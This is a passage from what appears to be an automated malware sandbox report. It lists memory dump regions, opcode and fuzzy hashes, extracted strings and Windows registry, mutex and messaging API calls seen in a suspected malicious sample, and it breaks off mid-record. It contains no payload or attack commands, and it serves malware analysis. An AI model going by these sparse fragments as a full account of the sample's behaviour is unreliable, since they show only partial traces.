                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c792fe6daadc02d10a06c241f564dfed88dfa095123346553209b2a782bb4879
                                              • Instruction ID: 43ad1fa710e31acef31531a9cd23187bd12b49c075dac0901cb83889ea095f1a
                                              • Opcode Fuzzy Hash: c792fe6daadc02d10a06c241f564dfed88dfa095123346553209b2a782bb4879
                                              • Instruction Fuzzy Hash: 38E061327340C1DBCF345AFE40145BE77A69FC516131B405BE507DB155CE919C40D352
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7a76c23a34c685551921ff4d4ec96bf4e28474ad67e0408fd23132884b26a0b
                                              • Instruction ID: 9cc44385df33303a931123e737fea95cc1f962e4ff095df5957facfcc812deba
                                              • Opcode Fuzzy Hash: d7a76c23a34c685551921ff4d4ec96bf4e28474ad67e0408fd23132884b26a0b
                                              • Instruction Fuzzy Hash: EAE0AB3232019187CF20DA9CC0207BA7FA6CFC1720B45847EDC4BCB345CEA2E8029B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abb8e16fa42e1dd4efc3ad1c784f3aee18e2e9d83a8784f286b605f7247d9911
                                              • Instruction ID: d09aeaebfd3e77a8302ccf7845495d73547afdf06e241882e8d671aceb518380
                                              • Opcode Fuzzy Hash: abb8e16fa42e1dd4efc3ad1c784f3aee18e2e9d83a8784f286b605f7247d9911
                                              • Instruction Fuzzy Hash: 73F05C509187E047CB1566FC44203793EC61BD3914F5940DFD097EF283CA644C01D395
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89f46228a99482c4f8ac1e9c7ccbcdde18f3aaa4e8cde4497fb343839fac2161
                                              • Instruction ID: fc71f26ae1b8851523a70fd142bc5922342051d187989c2d68bebfd82826744f
                                              • Opcode Fuzzy Hash: 89f46228a99482c4f8ac1e9c7ccbcdde18f3aaa4e8cde4497fb343839fac2161
                                              • Instruction Fuzzy Hash: 3EE0D135500B044BD324DE5FDC01553F7FAFBC07157648B3EA65983604DB70B5064694
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d4b5731b2fc5ec690e747b300b401ae49342a32686f8cfea8dbb119343cc6e5
                                              • Instruction ID: 043114d6a23956bbc9600ca8833ca9938b114cbbd44facc20c5589d0e44dc741
                                              • Opcode Fuzzy Hash: 2d4b5731b2fc5ec690e747b300b401ae49342a32686f8cfea8dbb119343cc6e5
                                              • Instruction Fuzzy Hash: D1E02B35714360CFCF5163F451193683EE64BAA12034B00A7D547C7366DD344C028722
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595749431.0000000002390000.00000040.00000040.sdmp, Offset: 02390000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54bc9455fa9afd9d3e7e3d043f026ffab4bbc81ba2274aebfcd4e6aa07e8d610
                                              • Instruction ID: b1b0aeeee4344b17082f051640453f2dba0ad30176c64d5f2074470b648cfa43
                                              • Opcode Fuzzy Hash: 54bc9455fa9afd9d3e7e3d043f026ffab4bbc81ba2274aebfcd4e6aa07e8d610
                                              • Instruction Fuzzy Hash: 28E092766006048BD650CF0BEC41452F7D8EB88630B18C07FDC0D8B700E235B504CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1852eceff63012543ae843a7e71fd75b2ac63afc946c6dea3b73a21d2bfbdf7
                                              • Instruction ID: 52e3617a5a1625a39265cef3fc327cc03ed89c4c3bc3c8a91c350da0356a64d8
                                              • Opcode Fuzzy Hash: d1852eceff63012543ae843a7e71fd75b2ac63afc946c6dea3b73a21d2bfbdf7
                                              • Instruction Fuzzy Hash: 72E08C227102286BEB48AA69DC12BB67B8FDB82715F14846AB80AD7341C822AC0643D4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7cbb49f219682f5313a06360dfe1e07491ffaff003d068a5705b716f1d157e2
                                              • Instruction ID: 72e5186e096daa3fdd337aa33ac5ba63ba799e58c0f33c844f90de94925ec1d8
                                              • Opcode Fuzzy Hash: e7cbb49f219682f5313a06360dfe1e07491ffaff003d068a5705b716f1d157e2
                                              • Instruction Fuzzy Hash: 9BE08C3172012097CF107AFDF8286AE3BCAAF80765B9400A6F10BCB654DE56CC01D3C6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27475d98f2880640b7e28a94d763a3274057fb241139cdc2058a92ec49461c8e
                                              • Instruction ID: 19fccbcb482e728b2284a49e294b1fe0d0e3c9d6559a93b662e02e749e281672
                                              • Opcode Fuzzy Hash: 27475d98f2880640b7e28a94d763a3274057fb241139cdc2058a92ec49461c8e
                                              • Instruction Fuzzy Hash: 63E09B31F102258BCF512BACA9142157BE7D78C5913514076DD47D3358CEB08C008FD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7fce57adfe39e1fff04c0b3250fae963c369c3c1b140aba5a5ce3444baa903c3
                                              • Instruction ID: 3c1757d1e3a56de6054a7ebe9d694a8381e55b722245976f9ebcb5407643f574
                                              • Opcode Fuzzy Hash: 7fce57adfe39e1fff04c0b3250fae963c369c3c1b140aba5a5ce3444baa903c3
                                              • Instruction Fuzzy Hash: A9E0D832320121878B24D69DD41146A7BDACBC5770391883ED80B8B305DEA2EC0587A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0346c926956eba3061b594f0bc5fb27ecd5bf6104c88b4ef8c3fc919ea2e2b28
                                              • Instruction ID: 30f34ed988d201cf778ccb2195b88d6e246326a5ddf1dd980f2af9f263d4e62b
                                              • Opcode Fuzzy Hash: 0346c926956eba3061b594f0bc5fb27ecd5bf6104c88b4ef8c3fc919ea2e2b28
                                              • Instruction Fuzzy Hash: EDE0863153C214DBCF6095E494147F2B79CE709315F94552EE89781249CEB1A842E793
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63bc2377358b70448348c977413bd5b3a7ac396008dd70026ef530a966611188
                                              • Instruction ID: d68d883217d1b5c5dbd51ae66087ffa6e7ba7ba25c2be247ca14d03723a6a78a
                                              • Opcode Fuzzy Hash: 63bc2377358b70448348c977413bd5b3a7ac396008dd70026ef530a966611188
                                              • Instruction Fuzzy Hash: 92E0C22417C108CBEF5012C0EC0A77633EDC308125FC05122901B8E17DCAEAA881FA23
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

                                              Non-executed Functions

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Offset: 00040000, based on PE: true
                                              • Associated: 00000004.00000002.592781888.0000000000040000.00000002.00020000.sdmp
                                              • Associated: 00000004.00000002.592910612.0000000000062000.00000002.00020000.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ,:ar$0`r$:@:r$X1ar
                                              • API String ID: 0-2614842347
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: hfe$hfe$hfe$hfe
                                              • API String ID: 0-729514276
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: >_?r
                                              • API String ID: 0-2961507119
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: X1ar$X1ar$X1ar$X1ar
                                              • API String ID: 0-346077691
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: :@:r$`5ar
                                              • API String ID: 0-3512261011
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: Z!p^$Y!p^
                                              • API String ID: 0-4260723622
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02D1AAB1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0557019D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375958650.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,E9AA1EF0,00000000,00000000,00000000,00000000), ref: 02D1ABB4
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 02D1AFEA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02D1AAB1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0557019D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375958650.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,E9AA1EF0,00000000,00000000,00000000,00000000), ref: 02D1ABB4
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1B841
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D1A58A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1BBB9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DispatchMessageW.USER32(?), ref: 02D1BE70
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DispatchMessage
                                              • String ID:
                                              • API String ID: 2061451462-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateIconFromResourceEx.USER32 ref: 02D1B78A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: CreateFromIconResource
                                              • String ID:
                                              • API String ID: 3668623891-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D1A58A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateIconFromResourceEx.USER32 ref: 02D1B78A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: CreateFromIconResource
                                              • String ID:
                                              • API String ID: 3668623891-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 02D1AFEA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1BBB9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1B841
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DispatchMessageW.USER32(?), ref: 02D1BE70
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DispatchMessage
                                              • String ID:
                                              • API String ID: 2061451462-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: r*+
                                              • API String ID: 0-3221063712
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea9306e9473893b79a3cce99a74fb43a9fbee73ac65c8243410e3c218401da72
                                              • Instruction ID: 2fb19acef962d331313d5befe1b95241b7028dd600d6b2993b9e48159c328786
                                              • Opcode Fuzzy Hash: ea9306e9473893b79a3cce99a74fb43a9fbee73ac65c8243410e3c218401da72
                                              • Instruction Fuzzy Hash: CDF0BE7071013847CB09767EA4166BF628F9BC8A58B64412FD10ADF798DEB68C0307EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374707651.0000000002EB0000.00000040.00000040.sdmp, Offset: 02EB0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ae89f408f1306fe2a83727e3eba043f8de48c366bf4308e013de2698e9df0ee
                                              • Instruction ID: 248d45eabdabd3a0ac799a0668ad32de3628aaf95460f9c99301f479aa8cfce4
                                              • Opcode Fuzzy Hash: 8ae89f408f1306fe2a83727e3eba043f8de48c366bf4308e013de2698e9df0ee
                                              • Instruction Fuzzy Hash: B0F0F4765487806FD3128B1AEC40893FFF8DF8663070884AFED888B712D125B908CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06e013e03ce28a1b772bc25297575acff2d0e35e32d26402b328e55f35844c5e
                                              • Instruction ID: cb682ab28ceaef377837e06e5b9f58500458d446af416d9da6859d9081606d36
                                              • Opcode Fuzzy Hash: 06e013e03ce28a1b772bc25297575acff2d0e35e32d26402b328e55f35844c5e
                                              • Instruction Fuzzy Hash: 4A01FB30304110CBC748DB2CD4599A9BBEABBC9710B2551ABE506DB775CEB69C0A8B82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55a7fb6b8682422e7a2facae5f7b5f08a11f07e4c9f2c362ea0ee985f6f2edf4
                                              • Instruction ID: 47e1c3804ee040bad094b67f7adb5efa5f9f663fbf408390a9e599d390b6a368
                                              • Opcode Fuzzy Hash: 55a7fb6b8682422e7a2facae5f7b5f08a11f07e4c9f2c362ea0ee985f6f2edf4
                                              • Instruction Fuzzy Hash: 84E0EC31E15218D6DB20E9F5D80A5EFBB9ADBCD250F114667D90F93350E97048064291
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a00df50fd72448645ff3a974e54133356a449177a3847c3e9e6ea84a1e8a8b6
                                              • Instruction ID: 1499f785684559e02b7cff810bf3de102a1facae2b1ea31336da378019706212
                                              • Opcode Fuzzy Hash: 1a00df50fd72448645ff3a974e54133356a449177a3847c3e9e6ea84a1e8a8b6
                                              • Instruction Fuzzy Hash: 2BE06131E456149BEF30A674EC0F4EFBFA9DEDD191B014537ED06C2250F6B1442E4AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 773efe31a863a21bfd129b2680c31c9442ef9ac45249c8086d78e228adba1124
                                              • Instruction ID: ded6372cd0b60a7267c0fa34f413bb4cc854bfb98c31186a5997ae0eca8dbaad
                                              • Opcode Fuzzy Hash: 773efe31a863a21bfd129b2680c31c9442ef9ac45249c8086d78e228adba1124
                                              • Instruction Fuzzy Hash: FBF0E531D15214D7E730EAB5C80B7EFBB9A9F99350F158A27990BA3350E97058474291
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374707651.0000000002EB0000.00000040.00000040.sdmp, Offset: 02EB0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
                                              • Instruction ID: ec224ce534ab3cc3a89ea1273e31d548cf89c937244b47b498e7eb1f8f8740ef
                                              • Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
                                              • Instruction Fuzzy Hash: 85F03135144644DFC706DF00D540B56FBA2FB89718F24C6ADE9490B752C337E913DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374707651.0000000002EB0000.00000040.00000040.sdmp, Offset: 02EB0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ab47f7bc1c6b862c10a20b32a7c8008c12089defa7e39d3e8132f414d64c7e0
                                              • Instruction ID: b77a542e9de936d965d07f58908cf2e31f9a78a23236be6dea695c7f1b59fffa
                                              • Opcode Fuzzy Hash: 1ab47f7bc1c6b862c10a20b32a7c8008c12089defa7e39d3e8132f414d64c7e0
                                              • Instruction Fuzzy Hash: 08E092766406009BD650CF0BEC81462F7D8EB88630B18C47FDC0D8B700E575B504CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f38e64ddfe5861f0237d573769b7dbc521de2ca423dacea3a77cee9763dd68f
                                              • Instruction ID: 109f3dfa31d7c5d0954c45287d1bacc37cfd5e03c44bf5e802d37110a004e38b
                                              • Opcode Fuzzy Hash: 6f38e64ddfe5861f0237d573769b7dbc521de2ca423dacea3a77cee9763dd68f
                                              • Instruction Fuzzy Hash: 5DE0C231A41384CFC7152734A41942837A99F872127040EB9E4228B7C1DA3ACC99CA41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ededde0e6506843ae51fe4da610a3ab9c0e2484d9721e4affa1a1d94b521744
                                              • Instruction ID: 568625c2271f462fa02d76bcc53e37997e05f2937e404b47690b669aadc41104
